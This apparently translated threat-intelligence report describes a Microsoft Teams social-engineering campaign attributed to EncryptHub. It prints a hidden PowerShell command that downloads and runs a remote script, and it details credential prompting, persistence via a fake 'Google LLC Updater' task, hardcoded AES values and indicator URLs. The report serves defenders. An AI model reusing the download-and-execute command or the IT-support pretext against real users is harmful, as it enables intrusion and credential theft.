В новом тревожном тренде корпоративной безопасности злоумышленники начали активно использовать Microsoft Teams - платформу для обмена сообщениями и совместной работы, долгое время считавшуюся доверенной внутренней средой - для доставки вредоносного ПО на основе PowerShell и получения несанкционированного удаленного доступа к системам Windows.
Описание
Путем выдачи себя за сотрудников IT-поддержки и использования методов социальной инженерии эти угрозные акторы обходят традиционные почтовые фильтры и сетевые защиты, нанося удар непосредственно по глубинной пользовательской доверенности к повседневным платформам коллаборации.
С момента своего запуска в 2017 году Microsoft Teams стала незаменимым инструментом для организаций по всему миру, обрабатывая чаты, встречи, обмен файлами и многое другое. Злоумышленники теперь используют повсеместное распространение Teams, создавая новых или компрометируя существующих клиентов Teams, а затем инициируя голосовые или чат-сессии под видом «IT SUPPORT», «Help Desk» или пользовательских имен, украшенных символами галочек для придания видимости легитимности.
Эти учетные записи обычно полагаются на домен Microsoft onmicrosoft.com и общие префиксы, такие как «admin» или «supportbotit», что указывает на автоматизированное или массовое создание аккаунтов. Как только сессия в Teams принимается - часто под предлогом плановой проверки производительности или технического обслуживания - злоумышленник направляет жертву к установке инструментов удаленного доступа, таких как QuickAssist или AnyDesk.
Через эти легитимные утилиты противник затем получает контроль над конечной точкой. В отличие от более ранних кампаний, связанных с BlackBasta ransomware (вымогателем), которые начинались с массовых рассылок по электронной почте с последующим переходом в Teams, некоторые недавние атаки полностью пропускают этап email, начинаясь напрямую через Teams. Эти вариации предполагают наличие нескольких групп исполнителей или развивающуюся тактику.
После установления удаленного контроля злоумышленники выполняют полезную нагрузку PowerShell, доставляемую через команду, такую как:
1 | powershell.exe -ExecutionPolicy Bypass -WindowsStyle Hidden -Command "Invoke-RestMethod -Uri https://audiorealteak[.]com/payload/build.ps1/iex" |
Этот многоэтапный скрипт обеспечивает кражу учетных данных, устойчивость, разведку системы и выполнение удаленного кода.
В начале скрипта уникальные жестко запрограммированные параметры AES - $iv = "&9*zS7LY%ZN1thfI" и $key = "123456789012345678901234r0hollah" - позволяют защитникам проводить расследования и связывать с предыдущими скриптами, приписываемыми финансово мотивированной группе EncryptHub, также известной как Water Gamayun или LARVA-208.
Отчеты OSINT связывают эту группу с эксплуатацией уязвимости нулевого дня CVE-2025-26633 (MSC EvilTwin) и специализированными семействами вредоносного ПО, включая SilentPrism и DarkWisp. При выполнении вредоносное ПО обеспечивает работу в одном экземпляре через глобальный мьютекс: $AppId = "62088a7b-ae9f-2333-77a-6e9c921cb48e". Затем оно компилирует и внедряет C# для вызова RtlSetProcessIsCritical из ntdll.dll, помечая процесс PowerShell как критический, чтобы его завершение вызывало сбой системы, усложняя реагирование на инциденты.
Функция SystemInfo собирает сведения о хосте - публичный IP, аппаратный UUID, данные операционной системы - форматирует их в JSON, шифрует с помощью AES и передает на C2-сервер злоумышленника. Для кражи учетных данных скрипт вызывает собственный запрос учетных данных Windows: $D = $Host.UI.PromptForCredential("Need credentials", …). Это бесшовное интегрирование в интерфейс Windows снижает подозрительность пользователей. Полученные учетные данные сохраняются в info.txt в каталоге AppData пользователя.
Устойчивость достигается путем первой попытки зарегистрировать запланированную задачу с именем «Google LLC Updater» для запуска полезной нагрузки при входе в систему, а затем откатом к ключу запуска реестра, если регистрация задачи не удается. Оба метода извлекают скрипт следующей стадии из резервного домена (https://cjhsbam[.]com/payload/runner.ps1), обеспечивая устойчивость к попыткам устранения.
Все коммуникации с C2 шифруются с использованием жестко запрограммированных AES-ключа и вектора инициализации, отправляются на https://audiorealtek[.]com/, а ответы расшифровываются и выполняются как задания PowerShell. Корпорации, использующие Permiso, могут применять встроенные обнаружения, такие как P0_M365_TEAMS_CHAT_CREATED_BY_SUSPICIOUS_EXTERNAL_USER_1 и P0_M365_TEAMS_CHAT_MEMBER_NAME_SUSPICIOUS_CHARACTER_1, для идентификации подозрительных взаимодействий в Teams.
Поскольку злоумышленники продолжают переходить на платформы совместной работы, организациям необходимо усиливать осведомленность о безопасности в отношении внешних чатов и голосовых вызовов, применять строгие списки разрешенных/блокируемых клиентов и отслеживать аномальное создание учетных записей в Microsoft Teams. Проактивное обнаружение жестко запрограммированных криптографических артефактов и необычных защит процессов в скриптах PowerShell может предоставить crucial early warning (критически важное раннее предупреждение) об этих развивающихся угрозах социальной инженерии.
Индикаторы компрометации
IPv4
- 104.21.40.219
- 193.5.65.199
URLs
- https://audiorealteak.com/payload/build.ps1
- https://cjhsbam.com/payload/runner.ps1
User Display Name
- @administratoritdep.onmicrosoft.com
- @cybersecurityadm.onmicrosoft.com
- @firewalloverview.onmicrosoft.com
- @luxadmln.onmicrosoft.com
- @replysupport.onmicrosoft.com
- @supportbotit.onmicrosoft.com
- @updateteamis.onmicrosoft.com
